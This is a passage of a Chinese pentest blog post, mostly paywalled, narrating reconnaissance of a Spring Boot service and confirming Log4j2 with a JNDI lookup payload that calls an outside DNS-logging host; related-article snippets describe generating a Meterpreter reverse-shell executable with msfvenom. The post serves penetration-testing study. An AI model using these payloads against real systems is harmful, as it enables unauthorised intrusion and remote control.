安全攻防-kali内网渗透实战

最新推荐文章于 2026-05-06 11:06:14 发布
原创 最新推荐文章于 2026-05-06 11:06:14 发布 · 7.8k 阅读 · 63
标签
#安全 #渗透测试 #网络安全 #kali linux #信息安全

外网打点

首先对web进行端口扫描,发现38080端口和22端口

image

访问一下38080端口发现是一个error page

image

用Wappalyzer看一下是什么架构,但是好像没有检测出来

image

【一>所有资源获取<一】
1、200份很多已经买不到的绝版电子书
2、30G安全大厂内部的视频资料
3、100份src文档
4、常见安全面试题
5、ctf大赛经典题目解析
6、全套工具包
7、应急响应笔记
8、网络安全学习路线

拿着报错去百度上发现应该是springboot

image

索性用goby再去扫一下,应该是spring没错,但是没有漏洞是什么操作?联想到最近出的log4j2的洞,可能他只是一个日志文件所以并没有框架

image

image

使用payload=${jndi:ldap://p9j8l8.dnslog.cn}验证一下有回显证明存在漏洞

image

最低0.47元/天 解锁文章
kali_Ma
关注
808080端口入侵
11-10
808080端口入侵808080
靶机渗透练习80-Momentum:1
hirak0的博客
04-21 1785
靶机描述 靶机地址:https://www.vulnhub.com/entry/momentum-1,685/ Description Info: easy / medium 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: IP地址:192.168.9.78 注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式) 该靶机环境搭建如下 将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式 将 VMw
Kali 基本操作与常用工具实战:从渗透测试流程到代码案例,一篇带你入门
最新发布
Web安全工具库
05-06 282
很多初学者总爱问:“学会 Kali,是不是就能做渗透测试了?不能。Kali 只是一个装满工具的工具箱。你是否理解渗透测试流程你是否知道每个阶段该收集什么信息你是否能从资产信息中发现漏洞入口你是否能准确验证漏洞你是否能输出一份专业报告工具可以换,方法论才是根本。
kali渗透测试:【实验2】一次简单的渗透测试实战
qq_38975218的博客
12-05 5160
启动 Kali 容器并进入到 bash 界面里,执行 ping 操作验证网络联通性: # 启动并进入 Kali 容器里的 bash docker run -ti --network host 3f457 bash # 在 Kali 容器中测试虚拟网络连接,使用 Ctrl-C 退出 ping: ping target 在 Kali 容器的 bash 界面里运行以下命令,注意 Nmap 的参数使用: -p:指定扫描的端口范围 -T4:设定 nmap 扫描的时间策略,数字为 0-5,越大越快。扫描的越慢则越
利用Kali 完成一次简单的渗透
热门推荐
qq_50905066的博客
03-20 3万+
这里我们需要两台虚拟机。一台Kali 作为攻击机,一台Ubuntu作为靶机。 如图: 渗透的话我们需要先得到靶机的ip 地址才能进行扫描。因为是虚拟机,只要我们知道了Kali 的ip 的地址,扫描其所在网段就可以获得靶机的地址了。 如图: 通过使用Kali自带的扫描工具执行Namp -sP 192.168.161.1/24就可以扫到了。这里我们排出太小的地址和太大的地址以及攻击的地址就可以确定靶机的地址了。 在得到靶机的地址之后,我们就可以进一步扫描靶机端口,从其中获得靶机开启的端口和..
kali linux的初学者之路(笔记)
m0_52181900的博客
05-08 1594
kali初学者笔记
渗透测试实战
weixin_45803006的博客
05-02 2673
下载kalikali上有很多做渗透测试的驱动,该软件在kali中就有。
《Web安全攻防渗透测试实战指南》笔记(一)
x1t02m的博客
09-02 1万+
前言 这个系列是拜读《Web安全攻防渗透测试实战指南》之后的一些笔记和实践记录,感谢作者对我学习过程的帮助,这本书值得大家入手学习。 信息收集 1.获取真实IP 2.域名信息 1.Whois查询 Kali自带了Whois,但是查国内域名比较鸡肋,站长之家更靠谱些 2.备案信息查询 ICP备案信息查询 天眼查(更详细) 3.子域名信息 Layer子域名挖掘...
视频教程-kali linux 渗透测试内网渗透-渗透测试
weixin_34792168的博客
05-28 1450
kali linux 渗透测试内网渗透 互联网公司安全攻防专家,世界五百强...
kali渗透内网和外网
zzz6583zz的博客
05-13 1550
第一步:输入msfvenom命令生成一个payload,相关参数与命令如下:-p:使用反向远程控制程序“windows/meterpreter/reverse_tcp”lhost:设置kali的IPlport:设置端口(要与下面的setlport保持一致)-f:文件的类型为exe类型-o:生成payload,名为payload.exe,保存在kali的/root目录下第二步:将生成的木马文件发送到对方电脑我们启动kalimsfconsole 进入msfconsole。
新书《Kali Linux2020 渗透测试指南》星球福利及最终目录&概要公布
Ms08067安全实验室
07-01 1509
Kali是世界渗透测试行业公认的优秀的网络安全审计工具集合,它可以通过对设备的探测来审计它的安全性,而且功能极为完备,几乎包含了目前所有的热门工具。Kali的强大功能是毋庸置疑的,它几乎...
Kali Linux】高级渗透测试实战
小洁洁
09-01 7517
>对于企业网络安全建设工作的质量保障,业界普遍遵循PDCA(计划(Plan)、实施(Do)、检查(Check)、处理(Act))的方法论。近年来,网络安全攻防对抗演练发挥了越来越重要的作用。企业的安全管理者通过组织内部或外部攻击队,站在恶意攻击者的视角,识别自身网络安全建设过程中的防护短板,检验安全应急预案的有效性并持续优化,为业务发展提供更强的保驾护航能力。
Kali渗透测试实战指南,不可错过的黑客利器
Hacker0830的博客
04-28 3118
Kali Linux是一款专业的渗透测试安全审计操作系统。Kali基于Debian GNU/Linux发行版,集成了数百个渗透测试安全审计相关的工具,是黑客和渗透测试人员最常用的操作系统之一。总的来说,学习Kali是一个长期的过程,需要不断学习和实践。但是,掌握Kali的使用对于网络安全人员和黑客攻防方面都有着重要的意义。希望本文所提供的Kali使用教程和相关推荐书籍和网站能够帮助到大家,提高大家的网络安全和黑客攻防技能,为网络安全和互联网的发展做出自己的贡献。kali渗透测试基础教程t=N3I4。
linux通过80端口系统入侵,【转】21和80端口入侵
weixin_35316606的博客
05-11 2120
首先申明我并不是一个HACKER,只是一个网络安全爱好者罢了。入侵的动机我保留,只记述过程啦!目标主机:10.75.166.12(我的ISP的真实内部地址)。目的:更改其WEB页,还有别的么?呵呵我保留!首先:看看这个网段都有那些机子,还有他们都开什么端口吧!我用scanner(很好的扫描工具)查出有N部机子。(其实我早就扫过了,呵呵),哈10.75.166.12只开了21,80 两个端口呀!先F...
kali渗透80端口的php,kali linux 网络渗透测试学习笔记(一)Nmap工具进行端口扫描...
weixin_28790465的博客
04-02 5598
一.利用Nmap扫描网站服务器的端口开放情况首先打开我们的kali linux才做系统,再打开其命令行模式,输入:nmap www.csdn.net 如下图所示: 因此,通过这个结果可以表明csdn上的端口开放了80端口以及443端口吗,这两个端口都十分重要,因为80端口适用于给用户呈现出数据,给用户看网站用的,443端口也是一个比较重要的端口。而且此网站并没有其他端口的开放,说明安全性还是很好的...
kali linux 中间人攻击
cg_sss的博客
05-21 1567
中间人攻击(Man-in-the-Middle Attack, MITM),是指攻击者跟受害者分别建立独立连接的一种入侵式攻击。最常出现于主机系统之间。
企业级红蓝对抗:KALI在真实攻防演练中的应用
SilvermistFalcon19的博客
01-06 861
在DMZ区的Web应用中发现了一个老旧版本的OA系统,通过搜索引擎快速匹配到对应的漏洞利用代码。KALI Linux提供的工具链在各个环节都展现出了极高的效率,特别是其模块化的设计让我们可以快速组合不同的攻击手段。这次经历让我深刻体会到,在真实的攻防场景中,KALI不仅仅是一个工具集合,更是一套完整的攻击模拟体系。演练结束后,使用KALI的日志清理工具清除所有操作痕迹,同时整理出详细的攻击路径图。我发现它的部署功能特别方便,不需要复杂的配置就能快速搭建测试环境,对于想学习网络安全的新手来说非常友好。
上传渗透----中国菜刀和kali的使用(安全攻防
baidu_38803985的博客
04-09 5731
1.实验环境 目标靶机:OWASP_Broken_Web_Apps_VM_1.2 下载地址 我们还需要中国菜刀和kali这两个工具 实验原理 1、文件上传(File Upload)是大部分Web应用都具备的功能,例如用户上传附件、修改头像、分享图片/视频等 2、正常的文件一般是文档、图片、视频等,Web应用收集之后放入后台存储,需要的时候再调用出来返回 3、如果恶意文件如PHP、ASP等执行文件绕...
kali渗透测试环境搭建
哆啦安全
08-07 1557
kali渗透测试环境搭建
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值